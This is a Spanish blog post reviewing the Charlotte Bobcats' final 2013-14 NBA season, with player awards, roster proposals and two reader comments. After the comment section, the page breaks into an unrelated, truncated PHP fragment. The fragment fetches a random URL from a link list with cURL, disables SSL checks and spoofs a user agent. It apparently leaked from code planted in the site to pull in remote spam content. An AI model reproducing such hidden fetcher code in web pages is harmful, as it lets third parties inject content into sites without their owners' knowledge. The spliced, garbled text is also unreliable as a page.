Charlotte Bobcats: Excelente

31 de July de 2014 por Sancho88

Ya avanzábamos en nuestro análisis previo que estábamos ante la última temporada de los Charlotte Bobcats, los linces rojos. Y qué mejor final de fiesta que el que se produjo en el estado de North Carolina, una primera ronda de Playoffs que les supo a gloria y fue el premio a toda una temporada de grandes esfuerzos y dedicación.

Por fin el proyecto de Michael Jordan obtuvo grandes réditos y es que la fulminante (y no menos esperada) derrota por 4-0 en las series de cuartos de final contra Miami Heat no empañó el gran resultado de la temporada regular en la que obtuvieron un dignísimo 43-39, el segundo mejor resultado desde la expansión de 2004.

Los Bobcats calcaron prácticamente los mismos resultados que en la última etapa de Larry Brown. Se quedaron a una sola victoria de aquel equipo de 2010 y, como ellos, sin poder estrenarse aún como franquicia ganadora en un partido de postemporada. En ambas ocasiones se cruzaron con una de las dos franquicias que habitan el estado de Florida, Orlando Magic en 2010 y Miami Heat esta temporada, y en ningún caso plantearon lucha. Un escaso bagaje para una franquicia en construcción que ha puesto punto y seguido en su corta historia con el cambio de imagen y de nombre. Por fin recuperan su nombre original: el de los Hornets.

Puede que la desidia general de la Conferencia Este tenga mucha culpa de esta brillante séptima plaza de los nuevos avispones pero sería restarle mérito al trabajo defensivo que ha instaurado Steve Clifford en su única temporada de trabajo con el equipo. Los Bobcats han sido el 4º equipo defensivo de la NBA solo por detrás de los incondicionales Bulls, Pacers y Grizzlies. Y eso les honra cuando contextualizamos su caso. Estos Bobcats nacen del histórico (por lo negativo) 7-59 de la 2011-2012, la temporada del ‘lockout’ y de la llegada de Kemba Walker al equipo. En ese momento eran el hazmerreir en defensa, el gran coladero de la liga incluso por delante de los Kings. Hoy son un equipo serio y aseado. En dos temporadas el cuento ha cambiado para bien.

La aventura de Kemba podría resumirse en este viaje de tres temporadas en los extintos Bobcats. Un equipo extraño, que nació con los Wallace, Okafor, Felton y May, que vio a jugones como Jason Richardson o Stephen Jackson en sus filas y que soñó con que Adam Morrison y Tyrus Thomas se convirtieran en jugadores de leyenda. Siempre fueron la ‘perita en dulce’ de la competición, el Minardi que se retiraba en la quinta vuelta. Ahora recogen el testigo los orgullosos Hornets, que plagaron las calles españolas en los 90 de chaquetas horteras con un abejorro gigante bordado en miles de colores azules y verdes que muchos veíamos cuando éramos pequeños. Demasiado ‘hipster’ y ‘vintage’ para pasar desapercibido.

Ha sido una gran despedida de los Bobcats, a los que aún les queda mucho por hacer, sobre todo en el ataque. La conexión Walker-Jefferson funcionó desde el primer día. Es sorprendente que ninguno de los dos disputara el All-Star Weekend. Sobre todo Al Jefferson, que promediando un magnífico 22-11 quedó fuera en detrimento de Roy Hibbert, al que ya no le queda prácticamente ningún crédito en la liga desde su gran ‘Playoff’ de 2013.

Por lo demás nos encontramos con un equipo muy trabajador en defensa pero muy escaso de aptitudes ofensivas. La llegada de Gary Neal en el mercado de invierno no fue suficiente para elevar la aportación en el juego exterior del equipo, y junto a Gerald Henderson no fueron capaces de juntar un par de piezas que complementasen el buen hacer de Walker y Jefferson.

El resto de jóvenes ganaron experiencia para el devenir de sus carreras disputando los Playoffs, pero eso es lo más destacable que se puede decir de los Michael Kidd-Gilchrist, Cody Zeller o Bismack Biyombo. El ‘hype’ de estas tres jóvenes promesas empieza a esfumarse. Es el peligro de calibrar a un jugador universitario por un buen torneo March Madness o calcular mal sus opciones en la NBA. El horroroso 11% en triples de MKG, la inevitable comparación de Zeller con Psycho-T o la reencarnación de Biyombo en una especie de Mohamed Sené o DeSagana Diop tienen que cambiar radicalmente si los nuevos Hornets quieren aspirar a algo más que una primera ronda. De momento ya han perdido a Josh McRoberts, y eso no parece muy positivo. El ya ala-pívot de Miami jugó una temporada sensacional en Charlotte, demostrando un IQ que no parecía tener en Los Ángeles y dejándonos muchas jugadas de calidad durante todo el año. No sabemos exactamente cómo ha conseguido evolucionar de un nivel cercano a Vladimir Radmanovic al jugador en que se ha convertido hoy en día. Los nuevos Hornets lo van a echar de menos.

El resumen se termina, y con él se extingue en nuestro blog una especie baloncestística extraña: el lince rojo. Es probable que en 20 o 30 años ya nadie se acuerde de aquellos tiernos y apalizables Bobcats. Larga vida a los Hornets.

PREMIOS

MVP: Al Jefferson. Pocos jugadores atesoran la calidad de Jefferson en toda la NBA. En el 1×1 es muy complicado pararle. Su juego de pies e inteligencia no tienen comparación y su físico es muy engañoso. Jefferson es un jugador que se mueve con mucha más agilidad de la que aparenta y eso le hace indefendible para los rivales. Le ha venido bien salir de Utah. Ahora parece mucho mejor jugador. Cuando llegó a los Bobcats muchos no entendieron su decisión pero ahora mismo es evidente que se está ganando con creces los 13’5 millones que le pagan en Charlotte. Alrededor de él y de Walker es posible construir una franquicia aspirante a semifinales en el Este. Lástima que se lesionase en Playoffs, pero ese hecho no puede empañar una magnífica campaña de esta ‘rara avis’ con calidad en un mundo de grandes físicos en el que imperan los Howard, Jordan, Drummond, etc.

Rookie: Cody Zeller. Es el único debutante que tenían y por eso es obligado dedicarle unas líneas. No tiene un tiro de media distancia consolidado y sus números son muy pobres pero fue progresando durante la temporada y es evidente que su año ‘sophomore’ será mucho más productivo que el primero. No obstante, una gran decepción para un pick 4 del draft. Se esperaba mucho más de él y no ha conseguido ser ni un 20% del jugador dominante que fue en Indiana. Tiene todo el tiempo del mundo para progresar, pero ahora ya parte por detrás de su compañero de universidad Noah Vonleh.

Sorpresa: Josh McRoberts. Por casualidad he buceado en los archivos de NBADRAFT, y no sabía si llorar o reir cuando vi la comparación con Chris Webber (menos atlético). Pero sus números (9-5-4) no hacen justicia a su aportación en la cancha.  El nuevo ‘gladiator’ de los Heat ha alcanzado seguramente su ‘best case’ personal. No está ni de lejos cerca de la leyenda de Webber, pero puede valer como complemento en un equipo aspirante al título. Lástima que LeBron no estuviera tan convencido de ello.

Decepción: Michael Kidd-Gilchrist. Ya no nos creemos demasiado al ‘all around player’ que parecía este chico en la universidad. El enésimo ‘The next Shawn Marion’ ha vuelto a sonrojarnos a los que confiábamos en su halo de estrella en ciernes. Su caso es muy similar al de Harrison Barnes. Le sobra por su defensa para ser un jugador con cierto protagonismo en cualquier equipo de la NBA pero parece demasiado poco para las cualidades que se le intuían. Una auténtica pena, pero es que en ataque es muy torpe. No sabemos si su caso tiene solución. Y ahora, además, llega Marvin Williams para quitarle el sitio. Eso es caer muy bajo MKG…

Esfuerzo en vano: Kemba Walker. Es extraordinario el esfuerzo y dedicación de Walker en la cancha. Cada día se esfuerza por mejorar como director de juego, pero se le siguen resistiendo los porcentajes de tiro, como al resto de sus compañeros (menos Jefferson). Es un problema que viene arrastrando desde su etapa en UConn, pero parece reversible aún.

JUGANDO A GM

A estas alturas del verano ya está todo prácticamente atado en los Hornets de cara a la nueva temporada, así que resumiremos un poco lo que ha ocurrido en la plantilla. Se llevaron a los rookies Noah Vonleh y P.J. Hairston en el draft y sumaron a Brian Roberts, Lance Stephenson y Marvin Williams en la agencia libre.

El nuevo proyecto ‘Hornet’ tiene bastante tirón y las incorporaciones de estos 5 jugadores añaden claramente mucha más calidad a un proyecto que se va a asentar con total seguridad en los playoffs los próximos años. En Charlotte empezaron a hacer las cosas bien drafteando a Walker, pero si hay un hombre que ha conseguido atraer al resto de la ‘tropa’ ese es Al Jefferson. Sin él hubiera sido imposible añadir a Lance Stephenson, de quien nadie esperaba un cambio de aires tan radical, y más cuando se suponía que Indiana estaba ahorrando para pagarle un buen contrato. El 27×3 de los Hornets era fácilmente igualable por los Pacers, aunque entrasen en impuestos de lujo por ello. Deportivamente merecía la pena ofrecerle algo parecido. Bird dijo que iba a poner 44 millones por él, pero del dicho al hecho hay mucho trecho. Parece una ruptura por falta de química en un vestuario que estaba lleno de ‘egos’ como el propio Stephenson había denunciado durante la temporada. No obstante, dicen que a mar revuelto ganancia de pescadores, y ese es el claro ejemplo de este fichaje. Los Bobcats vuelven a ganar un año más en la agencia libre, y Michael Jordan ha espabilado muchísimo como GM desde aquel fracaso en 2012.

Con Walker, Stephenson y Jefferson los Playoffs parecen asegurados. La llegada de Brian Roberts aporta bastante calidad a la segunda unidad del equipo, y Marvin Williams llega como un reto para Michael Kidd-Gilchrist. Después de su buena temporada en los Jazz el veterano alero parte con más papeletas para ser titular que MKG, aunque Clifford puede optar por colocarlo de 4 como en Utah. Desde luego que en algún momento probará con los dos jugadores como aleros altos acompañando a Jefferson.

Por su parte, las apuestas en el draft parecen buenas. Hairston va a aportar anotación desde la segunda línea. Esa parece ser la idea de Clifford, revolucionar con Roberts, Hairston y Neal que pueden anotar con bastante facilidad, mientras que la primera línea es más defensiva inicialmente. Y en la zona la idea sigue siendo rodear a Jefferson con jugadores jóvenes. Ahora el titular debe ser Vonleh, pero su nivel de exigencia va a ser grande. Es un gran prospecto de este draft, un top 5 por ‘hype’, pero debe mejorar su actitud. Ni en la NCAA ni en los workouts previos al draft ha demostrado tener mucha sangre. Muchos ya lo comparan con Chris Bosh, por su físico y su rango de tiro, ahora queda de su parte llegar a ser algo parecido al gran pívot de Texas. Menos mal que en los Bobcats trabaja Pat Ewing y le va a tutelar desde el principio. Parece el mejor destino para desarrollar a Vonleh. Es un pick ideal para ellos.

Como General Manager haría dos movimientos. El primero renovar a Chris Douglas-Roberts, que siempre aporta tiro exterior desde el banquillo, y el segundo un trade con los Kings Gerald Henderson x Derrick Williams. La razón es que Henderson no va a tener un rol titular con Stephenson y MKG por delante, y él se merece un equipo donde pueda jugar realmente. Y en estos Kings tendría bastante protagonismo. Además, un alero combo como Derrick Williams puede ayudar en la rotación igual que Marvin y aportar experiencia a toda la chavalería. Así, mi equipo quedaría de esta manera.

PG: Kemba Walker, Brian Roberts, Jannero Pargo
SG: Lance Stephenson, Gary Neal, P.J. Hairston
SF: Michael Kidd-Gilchrist, Marvin Williams, Jeff Taylor, Chris Douglas-Roberts
PF: Noah Vonleh, Cody Zeller, Derrick Wiliams
C: Al Jefferson, Bismack Biyombo

Comenta

2 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Nivel cercano a Radmanovic?? Xo Xo Xo
    Porqué me vuelves a nombrar a Radmapakete si ya casi lo tenía olvidado!!!

      Citar

  2. Esteban dice:
    #2

    me encanto, gran analisis
    no comparto en:

    muy duro le caes al pobre Zeller, es cierto que no ha demostrado grandes cosas, pero en este draft quien si? ha jugado en un equipo donde nadie ha hecho numeros superiores a los merecidos, de hecho Jefferson en los laker spodria haberse ido hasta los 27 por juego, por lo tanto, los 5 y 5 de ZELLER son muy reales, no ha maquillado nada como si han hecho otros rookies

    no ha tenido minutos basura como para lucirse, al contrario ha jugado para ayudar al equipo no para lucimiento personal

    que le falta muchisimo, es cierto, ahora que sea una decepcion no lo creo, es quiza el draft mas flojo de la historia, en un pick 4 conseguir un 4/5 q pueda jugar a buen nivel 20 minutos por juego no me parece poco

    es un trabajador, y mejorara su tiro sin dudas, y le veo un buen futuro como titular en la liga, no una estrella pero un jugador de rol titular

    sobre MKG, si sigue asi terminara siendo un Aminu de la vida, buen defensor y buen reboteador y poco mas, o espabila y mejora en ataque, o sera un fiasco mas de Jordan, aunque esta vez mas compartido con el publico en general

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>